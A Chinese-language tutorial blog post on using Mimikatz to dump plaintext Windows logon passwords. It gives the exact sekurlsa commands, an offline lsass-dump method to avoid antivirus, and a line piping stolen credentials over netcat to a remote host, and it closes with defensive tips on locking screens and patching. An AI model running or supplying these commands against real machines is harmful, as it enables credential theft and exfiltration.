内网渗透神器Mimikatz的入门简单实践
Mimikatz简介
Mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码
mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。
主页:https://blog.gentilkiwi.com/mimikatz
假设是一位毫无安全意识的员工,离开电脑未锁屏,他的电脑也属于纯裸奔(啥安全软件也不装)的情况,我们看看这种场景到底有多危险?
一、社工方式+mimikatz获取开机密码
1、设置了开机密码,但无锁屏的习惯
这里模拟攻击者,社工方式(假设借用一下电脑)进行社工
在电脑上下载mimikatz和nc等工具
浏览器下载mimikatz工具后,管理员身份运行命令行,使用mimikatz工具
获取登录密码
mimikatz.exe privilege::debug sekurlsa::logonpasswords full
可以看到Password :Windows@2022
2、获取到开机密码后,浏览器平时存的账号密码这些是否一览无遗
二、利用永恒之蓝漏洞进行攻击获取开机密码
同样假设这台Win7安装完之后未打永恒之蓝安全补丁,也没有装杀毒安全防护软件,只是锁屏
下面为kali机器使用msf攻击框架上传mimikatz获取开机密码的简单过程截图
所以打补丁,安装安全防护软件还是非常重要的!
三、防护技巧
1、安装杀毒安全软件,例如火绒,并且设置火绒退出密码
隔离区,信任区也设置安全操作密码
2、最重要也还要当然要养成离开电脑及时锁屏的习惯
不建议使用浏览器自动托管你的密码。
四、mimikatz的其他用法
不上传mimikatz,这样不用解决杀毒软件拦截的问题,直接导出lsass.exe的dump文件
并上传到自己的电脑,本地使用mimikatz进行分析
Mimikatz.exe sekurlsa::minidump D:\lsass.DMP sekurlsa::logonpasswords
当然mimikatz的其他用法还有很多,另外很多mimikatz的免杀工具,自行百度科普
导出成文件:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> d:\soft\mimikatz_output.txt
nc方式回传:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" | nc -vv 192.168.31.230 4444
五、总结:
人是信息安全意识中最薄弱的环节。安全技术和产品无法保护每一个人远离每一种可能存在的安全风险
如果还在用Win7,赶紧给自己电脑上的杀毒软件配置退出密码吧!